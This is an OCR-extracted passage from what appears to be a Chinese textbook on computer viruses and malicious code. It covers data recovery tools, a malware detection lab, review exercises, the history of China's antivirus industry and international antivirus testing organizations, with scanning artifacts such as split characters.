DiskGenius 内 核 开 发 而 成 ,除了 普通 用 户 很 少 接触 的 RAID 恢复 .加 密 分 区 恢复 等 ,其 数据 
恢复 功能 可 到 达 DiskGenius 软件 的 恢复 效果 。 


4. Recuva 


Recuva9( 发 音 同 “recover” ,恢复 ) 是 由 英国 软件 公司 Piriform 开发 的 Windows 下 的 数 
据 恢复 软件 。 它 可 以 用 来 恢复 那些 被 误 删 除 、 系 统 Bug 或 者 死机 导致 丢失 的 文件 ,也 可 以 
恢复 已 经 清空 的 回收 站 ,只 要 没有 被 重复 写 人 数据 ,能 直接 恢复 硬盘 、 闪 盘 、 存 储 卡 (如 SD 
卡 .MMC 卡 等 ) 中 的 文件 ,无 论 格 式 化 还 是 删除 均 可 直接 恢复 ,支持 FAT12、FAT16、 
FAT32、exFAT、NTFS、NTFS5、NTFS 十 EFS、ext2 .ext3 .ext4 等 文件 系统 。 

Recuva 的 优点 在 于 操作 简单 、 免 费 版 本 没有 广告 .支持 中 文 (虽然 支持 效果 差强人意 )。 


@ http://finaldata. com/finaldata-standard/。 
回 http://www. eassos. cn/dg/。 


图 http://www. piriform. com/recuva。 
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潞 


它 还 可 以 将 配置 保存 在 程序 文件 夹 内 为 . ini 文件 ,从 U 盘 运 行 。 
5. PC-3000 


PC-30009 是 由 俄罗斯 著名 硬件 数据 恢复 权威 机 构 ACE Laboratory 研究 开发 的 商用 
数据 恢复 和 硬盘 修复 的 系列 产品 。 它 是 从 硬盘 的 内 部 软件 来 管理 硬盘 ,进行 硬盘 的 原始 资 
料 的 改变 和 修复 。 

PC-3000 功能 强大 ,支持 的 文件 系统 包括 FAT、exFAT、NTFS、EXT2/3/4、HFS 十 、 
UFS1/2、XFS、ReiserFS、VMFS、VHD 等 , 支持 Seagate、Western Digital、Fujitsu、 
Samsung、Maxtor、Quantum、IBM (HGST)、HITACHI、TOSHIBA 、OCZ、Corsair、A- 
DATA、Micron、Plextor、SanDisk、Kingston 等 众多 厂商 的 硬件 产品 ,是 许多 从 事 数 据 恢复 、 
司法 取证 工作 的 专业 公司 的 必 备 工具 。 

PC-3000 系列 产品 分 别 面 向 硬盘 、RAID、 闪 存 、 固 态 硬盘 (Solid State Drives) 提供 了 对 
应 的 解决 方案 。 与 其 他 产品 不 同 的 是 : PC-3000 的 数据 恢复 解决 方案 是 软 硬 件 一 体 的 ,不 
仅 包括 用 于 问题 诊断 ,数据 恢复 的 软件 ,也 包括 相应 的 硬件 设备 。 针 对 用 户 在 修复 时 间 、 修 
复 能 力 、 修 复数 量 、 修 复 地 点 等 方面 的 不 同 需求 ,他 们 提供 了 PC-3000 Express、PC-3000 
UDMA、PC-3000 Portable 等 多 种 硬件 平台 选择 。 


10.9 综合 实验 
综合 实验 十 一 : 恶意 代码 检测 实验 (OAV) 


【实验 目的 】 

(1) 掌握 OpenAntiVirus 使 用 方法 。 

(2) 掌握 PatternFinder 使 用 方法 。 

(3) 掌握 VirusHammer 的 使 用 方法 。 

【能 力 提 升 】 

在 掌握 本 章 设计 实验 的 基础 上 ,有 富余 时 间 的 高 校 可 以 要 求学 生 在 OpenAntiVirus 的 
源 代码 方面 做 一 些 修改 工作 ,以 提升 能 力 。 

【实验 环境 】 

(1) Windows XP 操作 系统 。 

(2) Linux Fedora 9 。 

(3) Java JDK: JDK 1.6。 

(4) ScannerDaemon-0. 6.0。 

(5) PatternFinder-0. 7. 2。 

(6) VirusHammer-0. 1. 1。 

【实验 步骤 】 

详细 参考 附 书 电子 资源 。 


® http://www.acelaboratory. com/ 。 
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【实验 素材 】 
解压 目录 \comprehensive\Ch10\。 


10.10 习 题 


一 、 填空 题 
1. 比较 法 是 恶意 代码 诊断 的 重要 方法 之 一 ,计算 机 安全 工作 者 常用 的 比较 法 包 
2. 病毒 扫描 软件 由 两 部 分 组 成 : 一 部 分 是 ,含有 经 过 特别 选 定 的 各 种 恶意 代 


码 的 特征 串 ; 另 一 部 分 是 ,负责 在 程序 中 查找 这 些 特征 串 。 
二 、 选择 题 
从 技术 角度 讲 ,数据 备份 的 策略 主要 包括 ( ) ) 和 ( js 
A. 完全 备份 B. 差别 备份 
C. 增 量 备份 D. 差分 备份 
三 、 思 考题 


说 明 恶 意 代 码 检测 的 基本 原理 ,常用 的 检测 方法 有 哪些 ? 
. 举例 说 明 采 用 特征 代码 扫描 法 进行 恶意 代码 检测 的 过 程 。 
. 恶意 代码 的 清除 难度 远 远大 于 检测 的 难度 ,请 说 明 原因 。 
. 根据 本 书 的 内 容 ,探讨 防范 恶意 代码 的 六 部 分 内 容 。 


DP 


第 11 章 向 用 杀毒 软件 及 其 
解决 方案 


随 着 数字 技术 及 Internet 技术 的 日 益 发 展 ,恶意 代码 攻击 技术 也 在 不 断 发 展 提高 。 恶 
意 代码 的 传播 途径 越 来 越 多 ,传播 速度 越 来 越 快 ,造成 的 危害 越 来 越 大 ,几乎 到 了 令 人 防 不 
胜 防 的 地 步 。 企 业 在 建立 了 网 络 系统 后 ,急需 一 个 切实 可 行 的 解决 方案 , 既 要 确保 整个 企业 
的 业务 数据 不 受到 恶意 代码 的 破坏 ,又 要 保障 日 常 工作 不 受 恶 意 代 码 的 侵扰 。 

本 童 首先 介绍 国内 外 著名 的 反 病毒 软件 评测 机 构 , 以 及 国内 经 常 使 用 的 多 款 杀 毒 软件 ， 
其 次 介绍 企业 网 络 的 典型 结构 、 典 型 应 用 、 网 络 时 代 的 恶意 代码 特征 ,最 后 给 出 企业 网 络 结 
构 对 恶意 代码 防范 技术 和 工具 的 需求 ,从 而 给 出 一 些 针 对 典型 恶意 代码 的 防治 方案 。 

本 章 学 习 目 标 

(1) 了 解 国内 外 恶意 代码 防范 产业 发 展 历史 。 

(2) 了 解 国内 外 反 病 毒 软件 评测 机 构 。 

(3) 了 解 国内 外 著名 杀毒 软件 。 

(4) 掌握 恶意 代码 防治 解决 方案 。 


11.1 恶意 代码 防范 产业 发 展 


在 全 球 恶意 代码 防范 产业 发 展 的 历史 上 ,早期 曾经 出 现 了 一 大 批 有 影响 力 的 恶意 代码 
防范 软件 ,如 Anti-virus collection (V. Bontchev)、F-Prot, File Shiled (McAfee) NOD of 
Slovak AV、TbScan、AVP (Kaspersky) Dr. Web (lgor Daniloff)、Norton AV 、Solomon's 
ToolkitIBM Anti-Virus 等 。 

在 恶意 代码 防范 产业 发 展 的 早期 ,主要 集中 在 传统 计算 机 病毒 的 防治 软件 开发 方面 。 在 
我 国 ,也 是 以 防范 传统 计算 机 病毒 的 杀毒 软件 为 主 。 下 面 介绍 我 国 杀 毒 软件 的 发 展 过 程 ?。 

1988 年 ,引导 区 型 病毒 “小 球 ”" 和 “石头 ”开始 在 中 国 流行 。 之 后 ,计算 机 新 病毒 不 断 出 
现 。 当 时 国内 并 没有 专门 的 企业 和 管理 部 门 , 只 能 靠 一 些 程序 员 防 范 计算 机 病毒 。 

1989 年 7 月, 中国 公安 部 计算 机 管理 监察 局 监察 处 病毒 研究 小 组 编制 出 了 中 国 最 早 的 
杀毒 软件 Kill 6.0。 这 一 版 本 可 以 检测 和 清除 当时 在 国内 出 现 的 6 种 病毒 。Kill 杀毒 软件 
在 随后 的 很 长 一 段 时 间 内 一 直 由 公安 部 免费 发 放 。 

1990 年 ,深圳 华星 公司 推出 了 一 种 硬件 反 病毒 工具 , 即 华 星 防 病毒 卡 ,这 是 世界 上 最 早 
的 一 块 防 病毒 卡 。 在 那个 年 代 , 用 户 对 计算 机 还 缺乏 足够 的 了 解 ,认为 磁盘 上 的 东西 不 值 
钱 , 只 有 计算 机 中 看 得 见 、 摸 得 着 的 硬件 设备 才 值 得 花 钱 买 。 市 场 一 度 被 这 种 价值 观念 所 引 
导 , 这 也 使 华星 防 病毒 卡 获 得 了 很 好 的 销售 业绩 。 


@ 瑞星 : 中 国 反 病毒 产业 发 展 概述 ,http://edu. rising. com. cn。 


282 计算 机 病毒 与 恶意 代码 一 一 原理 、 技 术 及 防范 (第 4 版 ) 


1991 年 ,计算 机 病毒 的 数量 持续 上 升 , 在 这 一 年 已 经 发 展 到 几 百 种 ,杀毒 软件 这 一 行业 
也 日 益 活 跃 。 同 年 ,美国 Symantec 公司 开始 推出 杀毒 软件 ,同年 11 月 ,北京 瑞星 公司 成 立 ， 
并 推出 硬件 防 病毒 系统 , 即 瑞星 防 病毒 卡 。 随 后 的 几 年 ,病毒 数量 和 技术 不 断 提 高 ,频繁 的 
升级 需要 严重 制约 了 这 类 防 病毒 卡 的 进一步 发 展 ,硬件 防范 工具 慢 慢 退出 了 历史 舞台 。 

1993 年 上 半年 ,微软 发 行 了 自己 的 反 病毒 软件 一 一 微软 反 病 毒 软件 (MSAV)。MSAV 
是 微软 购买 了 另 一 家 公司 的 CPAV 杀毒 软件 后 推出 的 ,但 不 久 后 就 放弃 了 。 同 年 6 月 ,中 
国 公 安 部 正式 决定 以 金 展 安全 技术 实业 公司 的 名 义 进 行 Kill 的 商品 化 推广 。 

1993 年 冬 ,美国 Trend Micro( 趋 势 科 技 ) 成 立 了 趋势 科技 北京 分 公司 ,开始 推广 趋势 的 
PC-cillin。 然 而 ,坚持 了 不 到 两 年 ,这 个 分 公司 就 关 掉 了 。2001 年 8 月 ,趋势 科技 重新 成 立 
了 中 国 分 公司 ,在 北京 、 上 海 和 广州 设立 了 分 部 ,开始 在 国内 市 场 主打 网 关 防毒 产品 。 

1994 年 , 王 江 民 编制 “KV100” 杀 毒 软件 ,并 以 20 000 元 的 价格 转让 了 销售 许可 ,其 推广 
名 为 “超级 巡警 "。 一 年 后 ,KV100 升级 为 KV200, 并 和 北京 华星 合作 ,营销 取得 成 功 。 

1997 年 ,南京 信 源 公司 首次 推出 具有 实时 监控 功能 的 病毒 防火 墙 。 同 年 ,华美 星际 推 
出 了 “病毒 克星 ”。 

1998 年 ,瑞星 公司 依靠 OEM 策略 ,先后 与 方正 、 联 想 、 同 创 、 浪 潮 、 实 达 等 计算 机 生产 
商 达 成 合作 协议 ,捆绑 销售 其 杀毒 软件 ,获得 了 市 场 成 功 。 到 1998 年 年 底 为 止 ,瑞星 杀毒 软 
件 已 经 尽 人 缘 知 。 

1998 年 ,南京 信 源 开始 分 家 ,先是 划分 成 北方 市 场 和 南方 市 场 分 别 经 营 ,然后 由 于 市 场 
和 经 营 理念 的 冲突 及 公司 内 部 的 矛盾 ,开始 相互 起 诉 和 争斗 ,两 家 公司 因此 元 气 大 伤 , 市 场 
份额 和 影响 力 急剧 下 降 。 

1998 年 5 月 ,中国 金 展 安全 技术 实业 公司 和 美国 CA 公司 共同 合资 成 立 北京 冠 群 金 展 
软件 有 限 公司 ,同时 宣布 在 北京 成 立 产品 研发 中 心 。1998 年 7 月 , 冠 群 金 展 公 司 发 布 Kill 
认证 版 。 该 产品 虽然 还 称 为 Kil, 但 核心 技术 已 经 完全 转换 为 CA 公司 的 技术 。 

1999 年 6 月 ,金山 公司 首次 发 布 金山 毒霸 的 测试 版 ,开始 尝试 进入 杀毒 软件 市 场 。 
2000 年 11 月 ,金山 毒霸 正式 进入 恶意 代码 防范 软件 市 场 。 

2000 年 前 ,北京 时 代 先 锋 推出 了 “ 行 天 98" 杀 毒 软件 ,但 不 久 即 退出 市 场 。 其 间 ,交大 铭 泰 
公司 推出 的 东方 卫士 也 曾经 在 杀毒 市 场 上 风光 一 时 ,但 由 于 种 种 原因 ,逐渐 退出 了 杀毒 市 场 。 

奇 虎 公司 创立 于 2005 年 9 月 ,并 于 2006 年 7 月 推出 了 专门 查 杀 流 谍 软 件 的 360 安全 
卫士 (www. 360. cn) 。 经 过 不 断 的 改进 和 升级 ,截至 2009 年 年 底 ,360 安全 卫士 已 发 展 成 为 
最 受 网 民 欢 迎 的 集 查 杀 木 马 、 防 盗号 ,漏洞 管理 等 功能 为 一 体 的 安全 工具 软件 ,拥有 1.6 亿 
用 户 , 网 民 覆 盖 率 超过 60%。 此 后 , 奇 虎 公司 还 推出 了 360 安全 浏览 器 、360 保险 箱 等 系列 
产品 ,并 完全 免费 。 


11.2 国内 外 反 病 毒 软件 评测 机 构 


在 网 站 或 杀毒 软件 产品 的 宣传 资料 上 看 到 的 各 种 杀毒 软件 的 评测 和 自我 宣传 ,经 常会 
谈 及 一 些 软件 评测 机 构 ,那么 哪些 评测 机 构 是 最 权威 的 呢 ? 它们 的 评测 依据 是 什么 ? 为 什 
么 会 被 用 户 认可 呢 ? 
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本 节 介 绍 维护 全 球 恶 意 代 码 库 的 著名 机 构 一 一 WildList 和 AMTSO, 以 及 全 球 权威 评 
测 机 构 一 一 AV-test、Virus Bulletin、AV-Comparatives、ICSA ,最 后 介绍 恶意 代码 防范 产品 
在 中 国 的 市 场 准 入 评测 机 构 。 

需要 说 明 的 是 ,WildList 和 AMTSO 只 提供 恶意 代码 样本 ,本 身 并 不 进行 任何 测试 ; 各 
权威 评测 机 构 都 是 由 民间 自发 组 织 ,并 独立 存在 的 ,与 厂商 及 政府 间 没 有 任何 利益 关系 ,也 
不 收取 任何 被 测试 厂商 的 赞助 费 。 这 样 的 方式 保证 了 各 自 的 独立 性 。 


11.2.1 WildList 


阅读 有 关 恶 意 代 码 防 范 技术 的 文章 时 ,经 常会 看 到 WildList 这 个 词 ,事实 上 它 就 是 由 
WildList 提供 的 恶意 代码 清单 。 

WildList Organization 于 1993 年 7 月 由 反 病毒 研究 者 Joe Wells 所 创办 ,其 目的 是 跟 
踪 那 些 现实 世界 中 传播 的 恶意 软件 。 现 在 约 有 80 名 顶尖 防 病毒 研究 人 员 参 与 其 中 工作 ,并 
每 月 重新 修订 该 清单 并 向 外 发 布 。 该 机 构 在 成 立 之 初 便 整理 了 当时 多 份 病毒 清单 报告 ， 
把 该 报告 交 由 几 位 恶意 代码 防范 专家 作 参 考 , 之 后 还 参与 了 对 遗漏 部 分 的 修改 与 补充 。 该 
清单 公布 后 不 久 , WildList 即 成 为 业界 用 以 测试 与 认识 产品 的 重要 标准 。WildList 成 立 的 
目的 并 不 是 进行 反 病毒 产品 的 评测 ,而 是 为 其 他 评测 机 构 提供 最 准确 的 恶意 代码 清单 或 样 
本 ,因而 倍 受 评测 机 构 或 研究 机 构 推 尝 。 

目前 , WildList 是 全 球 主要 恶意 代码 信息 的 提供 者 , 它 所 提供 的 WildList 列表 包含 了 
当时 有 实际 感染 和 传播 行为 而 被 发 现 的 恶意 代码 ,来 自 于 全 球 权威 组 织 与 专家 。 该 
WildList 对 恶意 代码 的 收录 采取 非常 严谨 的 态度 ,首先 必须 有 两 位 或 两 位 以 上 的 恶意 代码 
专家 向 该 机 构 报 告发 现 该 款 恶 意 代码 , 且 该 报告 必须 附 有 恶意 代码 的 样 例 ,才能 列 人 清单 
中 。WildList 的 收集 过 程 虽然 较 慢 ,但 可 确保 所 有 收录 的 恶意 代码 都 是 确实 存在 并 具有 破 
坏 性 , 且 实 际 发 生 过 感染 。WildList 列表 可 供 业 界 所 有 成 员 分 享 。 

由 于 该 组 织 是 各 种 评测 机 构 进 行 评测 时 的 主要 恶意 代码 样本 来 源 , 而 自身 不 进行 评测 ， 
青 加 上 其 大 而 全 面 的 恶意 代码 库 , 因 此 被 各 组 织 机 构 和 专业 人 士 一 致 推举 为 最 公平 的 组 织 。 
虽然 不 进行 评测 ,但 它 地 位 非常 高 ,在 恶意 代码 防范 行业 内 的 影响 力也 极其 深远 ,很 多 厂商 
都 要 寻求 和 它 交 换 恶 意 代码 样本 。 可 以 说 , WildList 是 恶意 代码 防范 行业 不 可 或 缺 的 资 
料 库 。 

2002 年 WildList Organization 并 入 ICSA (International Computer Security Association, 
国际 计算 机 安全 协会 ) 。 


11.2.2 AMTSO 


AMTSO(Anti-Malware Testing Standards Organization , 反 恶 意 软 件 测 试 标准 组 织 )@ 
成 立 于 2008 年 ,是 一 个 国际 性 非 营利 组 织 ,致力 于 研究 反 恶 意 软件 测试 方法 ,以 提高 测试 的 
客观 性 和 准确 性 。 它 的 成 员 单位 目前 已 超过 50 家 ,包括 反 恶意 软件 企业 .权威 评测 机 构 、 相 
关 供 应 商 企业 等 。AV-Comparatives .AV-Test、ICSA Labs、Virus Bulletin 等 独立 测试 机 构 


® Wildlist Organization International, http://www. wildlist. org. 
回 AMTSO, http://www.amtso. org/。 
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都 在 其 中 。 

AMTSO 的 主要 工作 包括 : 为 讨论 反 恶 意 软件 及 其 相关 产品 的 测试 工作 提供 交流 平 
台 ; 开发 和 宣传 反 恶 意 软件 及 其 相关 产品 测试 的 客观 标准 和 最 佳 实践 ; 促进 对 反 恶 意 软件 
及 其 相关 产品 测试 的 教育 和 认识 ; 为 基于 标准 的 测试 方法 提供 工具 和 资源 。 

AMTSO 发 布 了 一 系列 与 反 恶 意 软 件 产品 和 解决 方案 相关 的 操作 指南 和 最 佳 实践 文 
档 。2017 年 5 月 ,AMTSO 还 提出 了 反 恶 意 软件 测试 协议 标准 草案 (Testing Protocol 
Standards for the Testing of Anti-Malware Solutions) ,为 测试 人 员 和 供应 商 提 供与 反 恶 意 
软件 测试 相关 的 行为 和 信息 标准 。 

AMTSO 建立 和 维护 了 一 个 恶意 软件 样本 库 一 一 实时 威胁 列表 (Real-Time Threat 
List,RTTL) ,样本 由 世界 各 地 的 反 恶 意 软件 公司 和 反 恶 意 软 件 专 家 提交 。AMTSO 通过 
RTTL 提供 公用 平台 。 测 试 人 员 可 在 该 平台 上 获得 恶意 软件 样本 ,以 及 厂商 和 研究 人 员 提 
供 的 相关 监测 数据 ,从 而 为 测试 人 员 提 供 基于 不 同 攻击 频率 和 地 区 差异 的 恶意 软件 样本 进 
行 测试 。 同 时 ,相关 研究 人 员 也 可 以 利用 该 平台 进行 学 术 研 究 或 趋势 分 析 。 


11.2.3 AV-Test 


AV-Test® 起 源 于 德国 马 德 堡 大 学 和 AV-Test GmbH 共同 合作 的 研究 计划 ,各 项 反 病 
毒 测试 是 由 技术 与 商业 信息 系统 学 院 (Institute of Technical and Business Information 
systems) 的 商业 信息 系统 团队 在 研究 实验 室 进行 的 。2004 年 ,Andreas Marx、Oliver Marx 
和 Guido Habicht 在 马 德 堡 创立 AV-Test 反 病 毒 测试 有 限 责 任 公司 。 

作为 国际 权威 的 第 三 方 独立 测试 机 构 之 一 , AV-Test 定期 采用 海量 样本 库 ( 大 于 100 
万 种 的 恶意 代码 样本 库 ) 进 行 自动 测试 ,这 种 方式 可 以 极 大 地 减少 人 为 因素 对 测试 结果 的 干 
扰 , 其 测试 结果 被 国际 安全 界 公 认为 独立 客观 。 

目前 ,AV-Test 每 两 个 月 进行 一 次 测评 。 他 们 将 自主 地 选择 当下 常用 的 恶意 代码 查 杀 
产品 进行 测评 ,包括 家 用 产品 和 企业 级 解决 方案 。 其 中 ,由 于 企业 级 解决 方案 的 应 用 环境 较 
为 复杂 且 具 有 和 多样 性 ,AV-Test 一 般 选 择 在 厂商 推荐 的 配置 方案 下 进行 测评 。AV-Test 能 
在 多 个 平台 上 对 产品 进行 全 面 测 试 ,测试 内 容 包 括 (但 不 限于 ) 恶 意 代码 爆发 测试 ,压缩 档案 
测试 、 对 海量 恶意 代码 样本 的 按 需 扫描 与 常 驻 防护 测试 .ItW (in the wild, 自动 散播 型 ) 恶 意 
代码 测试 ,扫描 速度 测试 、 系 统 性 能 影响 测试 等 。 测 评 项 目 分 为 防护 ,修复 和 易 用 性 3 项 ,每 
个 项 目 满分 为 6 分 ,总 分 为 18 分 。 总 分 超过 10 分 , 且 单项 成 绩 至 少 1 分 的 产品 方 能 通过 评 
测 。 其 中 ,家 用 产品 获得 AV-Test CERTIFIED 认证 ,企业 级 解决 方案 (产品 ) 获 得 AV-Test 
APPROVED CORPORATE ENDPOINT PROTECTION 认证 。 测 评 结果 均 公 布 在 其 官方 
网 站 上 。 


11.2.4 Virus Bulletin 


Virus Bulletin? 于 1989 年 在 英国 成 立 , 是 国际 最 有 名 、 历 史 最 悠久 的 恶意 代码 测试 机 
构 之 一 。Virus Bulletin 除了 致力 于 提供 给 计算 机 使 用 者 公正 、 客 观 、 独 立 的 防 病毒 相关 信 


四 AV-Test, http://www.av-test. org。 
@ Virus Bulletin, http://www. virusbtn. com。 
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息 外 ,还 定期 出 版 同名 杂志 Virus Bulletin ,主要 以 有 害 软件 与 垃圾 邮件 防护 ,检测 及 清除 为 
题材 ,登载 由 业界 专家 撰写 的 技术 文章 ,提供 最 新 恶意 代码 威胁 分 析 , 探 索 恶 意 代码 防范 领 
域 的 最 新 进展 ,并 提供 恶意 代码 防范 软件 的 详尽 测试 报告 。 同 时 , 它 也 在 世界 各 地 举办 不 同 
题材 的 VB 会 议 (VB Conference) ,给 予 专业 人 士 聚 在 一 起 讨论 最 新 研究 成 果 与 分 享 新 技术 
的 机 会 。 

Virus Bulletin 开展 包括 恶意 代码 查 杀 .垃圾 邮件 过 滤 、 恶 意 网 站 /网 页 过 滤 技 术 等 方面 
的 测评 认证 。 其 中 ,VB100 认证 是 对 恶意 代码 查 杀 软件 的 最 高 荣誉 认证 ,着 重 测试 恶意 代 
码 防 范 软件 的 病毒 检 出 率 、 扫 描 速度 及 误 报 率 ; VBSpam 着 重 测试 企业 级 垃圾 邮件 过 滤 技 
术 ; VBWeb 则 关注 于 网 站 网 关 如 何在 不 妨碍 用 户 在 网 上 获取 有 用 资源 的 同时 阻止 访问 危 
险 的 网 站 和 网 页 。 

Virus Bulletin 每 两 个 月 便 会 组 织 对 各 大 杀毒 软件 产品 ,在 不 同 的 计算 机 软 硬 件 平台 
上 ,用 WildList 清单 发 布 的 恶意 代码 新 样本 进行 测试 。 每 次 参与 测试 的 品牌 有 30 种 左右 ， 
只 有 那些 能 够 在 主动 与 被 动 两 种 模式 下 均 能 完全 辨认 出 WildList 清单 中 的 所 有 恶意 代码 ， 
并 在 扫描 过 程 中 没有 任何 误 判 的 防 病 毒 软件 ,才能 取得 VB100 认证 。 在 2006 年 到 2008 年 
6 月 发 表 的 测试 报告 中 ,只 有 不 超过 四 分 之 一 的 防 病毒 软件 是 可 以 100% 清 除 样 本 恶意 代码 
的 。 例 如 ,2008 年 6 月 只 有 8 家 机 构 取得 VB100 认证 ,而 在 2006 年 间 曾 经 有 一 个 月 只 有 
4 家 机 构 取 得 VB100 认证 。 

由 于 不 同 产 品 会 随 着 网 络 上 恶意 代码 的 不 断 更 新 而 表现 时 好 时 坏 , 因 此 一 般 应 以 杀毒 
软件 产品 取得 VB100 次 数 的 多 少 来 衡量 其 表现 。 虽 然 有 众多 的 厂商 参与 评测 ,但 能 够 连续 
通过 VB100 认证 的 厂商 少 之 又 少 ,其 中 ,NOD32、Kaspersky 和 Norton 是 获奖 次 数 较 多 的 
厂商 。 


11.2.5 AV-Comparatives 


AV-Comparatives2( 以 下 简称 AVC) 总 部 位 于 奥地利 ,由 Andreas Clementi 在 2003 年 
成 立 。 该 组 织 每 年 不 定期 选择 安全 软件 市 场 中 的 具有 一 定 影响 力 的 安全 产品 ,采用 包括 后 
门 程序 .木马 程序 .邮件 蠕虫 .脚本 病毒 及 其 他 各 类 有 害 程序 在 内 的 数 千 个 病毒 样本 对 杀毒 
软件 的 查 杀 病 毒 能 力 ,扫描 速度 \ 误 报 率 等 指标 进行 测试 。AVC 每 年 都 会 发 布 固定 的 年 度 
评测 报告 ,评测 报告 中 会 以 客观 角度 指出 各 厂商 杀毒 软件 的 优 缺 点 及 建议 。2017 年 人 选 参 
测 的 厂商 有 21 家 ,其 中 国内 的 腾讯 人选。 

目前 ,AVC 的 测试 项 目 包括 产品 动态 保护 能 力 测试 .恶意 软件 保护 测试 、 性 能 测试 、 启 
发 式 /行为 测试 . 误 报 测试 .恶意 软件 清除 测试 ,文件 检测 率 测 试 ` 反 垃圾 邮件 测试 ` 反 钓鱼 测 
试 、 移 动 安全 产品 测试 .Mac 安全 产品 评测 .产品 业务 能 力 评 测 .单项 产品 测试 等 。 各 个 测 
试 项 目的 测试 频率 各 不 相同 ,如 产品 动态 测试 的 结果 每 月 公布 一 次 ,半年 进行 一 次 总 结 ; 性 
能 测试 ,文件 检测 率 测 试 半年 一 次 等 。 测 试 结果 分 为 四 级 , 巾 低 到 高 分 别 为 TESTED、 
STANDARD、ADVANCED 和 ADVANCED 十 。 项目 测试 结果 及 测试 总 结 等 数据 资料 都 
可 以 在 网 站 上 查看 。 

AVC 一 直 致 力 于 新 测试 技术 的 开发 ,其 中 ,动态 保护 能 力 测试 模拟 用 户 每 天 的 计算 机 


四 AV-Comparatives, http://www.av-comparatives. org/ 。 
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使 用 习惯 和 每 天 的 网 络 环境 下 的 种 种 常见 情况 ,测试 复杂 而 全 面 。AVC 的 启发 式 /行为 测 
试 (Heuristic / Behaviour Tests) 重 点 在 测试 扫 毒 引擎 对 未 知 病毒 的 侦 测 能 力 上 。 测 试 时 ， 
先 冻 结 防毒 软件 引擎 与 恶意 代码 数据 库 3 个 月 ,并 以 这 3 个 月 内 出 现 的 恶意 代码 新 品种 作 
为 测试 样本 测试 其 检查 新 恶意 代码 的 能 力 。 在 测试 中 ,除了 会 考虑 防 病毒 软件 发 现 的 新 恶 
意 代码 比例 外 ,还 会 考虑 其 扫描 速度 与 恶意 代码 误 判 数量 。2016 年 AV-Comparatives 基于 
AMTSO 的 RTTL 样本 库 , 选 择 了 29 款 PC 端的 恶意 代码 防护 产品 进行 了 两 次 认证 测试 
(Certification Tests) ,评测 结果 需要 检 出 率 达 到 98% 以 上 才能 获得 认证 。 除 ESET Smart 
Security, Avast Free Antivirus, Kaspersky Internet Security, McAfee Internet Security、 
Symantec Norton Security Premium 等 国外 公司 产品 外 ,我 国 的 Tencent PC Manager 也 两 
次 都 通过 认证 测试 。 


11.2.6 ICSA 实验 室 


ICSA 实验 室 (ICSA Labs)9 是 Verizon 公司 的 下 属 单位 。 作 为 独立 的 检测 机 构 ,ICSA 
提供 网 络 安全 产品 功能 性 和 安全 性 方面 的 认证 ,以 及 网 络 和 系统 管理 人 员 安 全 专业 技术 的 
能 力 认证 。ICSA 的 认证 标准 是 由 咨询 界 的 专家 .厂商 及 使 用 者 的 意见 制定 出 来 的 ,以 认证 
项 目的 安全 性 及 功能 性 为 主要 考察 内 容 。ICSA 的 认证 标准 会 随 着 各 项 安全 技术 及 安全 威 
胁 的 不 断 发 展 而 每 年 更 新 ,并 以 更 新 后 的 标准 来 测试 产品 。 另 外 ,如 果 厂 商 之 前 推出 的 产品 
已 经 获得 认证 ,其 之 后 推出 新 款 的 产品 也 会 自动 得 到 ICSA 的 认证 。 但 是 为 了 确保 新 款 的 
产品 同样 符合 原先 认证 的 标准 ,ICSA 会 与 厂商 签订 条 约 , 要 求 厂商 的 产品 发 展 不 能 违背 原 
先 标准 。 如 果 ICSA 抽 测 发 现 没 有 符合 原先 认证 的 内 容 ,厂商 会 被 要 求 限期 改善 ,否则 吊销 
认证 。 

凡是 获得 ICSA 实验 室 认 证 的 反 病毒 产品 在 减少 因 恶 意 代 码 而 引起 的 安全 隐患 方面 ， 
都 可 以 满足 一 系列 的 公众 检验 标准 和 业界 接受 的 规范 。 并 且 ISCA 会 对 得 到 认证 的 产品 进 
行 频 率 不 超过 一 个 季度 的 后 续 测试 ,以 保障 产品 品质 的 持续 性 。 

ICSA 实验 室 在 Internet 网 关 领 域 认 证 的 标准 极其 严格 ,产品 必须 要 100% 检 测 到 当前 
WildList 恶意 代码 列表 中 已 列 出 的 恶意 代码 ; 检测 到 ICSA 宏 病 毒 库 中 90% 的 病毒 ; 检测 
到 压缩 文件 中 的 恶意 代码 ; 检测 到 以 uuencode 格式 进行 编码 的 电子 邮件 中 的 恶意 代码 ; 检 
测 到 以 MIME 格式 进行 编码 的 电子 邮件 中 的 恶意 代码 ,并 在 扫描 时 能 够 记录 所 有 的 活动 。 

认证 测试 是 由 ICSA 实验 室 或 受过 其 培训 及 授权 的 实验 室 进行 。ICSA 的 评测 对 象 除 
了 恶意 代码 防范 产品 以 外 ,还 包括 几 类 安全 产品 : Firewall (防火 墙 )、Secure Internet 
Filtering( 互 联网 安全 过 滤 )、PC Firewall (个 人 防火 墙 ) 、Cryptography (密码 防护 )、 
Intrusion Detection( 入 侵 检 测 )、IP Sec( 网 络 安全 协议 )、Web Applications (Web 应 用 )、 
WLAN Security( 无 线 网 络 安全 ) 等 。 从 这 些 评测 项 目 可 以 看 出 ICSA 认证 对 象 以 保护 内 部 
网 络 的 安全 产品 为 主 。 

ICSA 每 个 月 都 会 做 出 一 次 防 病毒 的 认证 评测 ,并 将 评测 的 报告 公布 到 网 站 上 ,任何 人 
都 可 以 查阅 最 新 的 评测 报告 。 从 2004 年 至 今 的 所 有 评测 结果 也 都 可 以 在 该 网 站 上 查阅 。 
任何 一 款 安全 产品 都 是 以 通过 (Pass) 和 失败 (Fail) 来 标示 的 ,没有 其 他 级 别 。 


@ ICSA, 国 际 计算 机 安全 协会 ,http://www. icsalabs. com。 
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11.2.7 中 国 反 病毒 软件 评测 机 构 


国家 计算 机 病毒 应 急 处 理 中 心 ? 是 经 公安 部 推荐 ,由 原 国 信 办 于 2001 年 批复 成 立 的 ， 
是 我 国 唯一 的 负责 计算 机 病毒 应 急 处 理 的 专门 机 构 ,主要 职责 是 快速 发 现 和 处 置 计算 机 病 
毒 疫情 与 网 络 攻击 事件 ,保卫 我 国 计 算 机 网 络 与 重要 信息 系统 的 安全 。 承 担 国务 院 各 部 委 
和 多 个 重要 政府 部 门 网 站 的 7X24 小 时 安全 监测 任务 ,并 拥有 国内 最 权威 的 恶意 代码 样本 
信息 库 , 目 前 共存 储 计算 机 病毒 样本 1600 万 余 个 。 

其 下 属 的 计算 机 病毒 防治 产品 检验 中 心 ( 下 称 检验 中 心 ) 成 立 于 1996 年 ,是 目前 我 国 计 
算 机 病毒 防治 领域 移动 安全 领域 和 APT 安全 监测 领域 唯一 获得 公安 部 批准 的 产品 检验 
机 构 。 

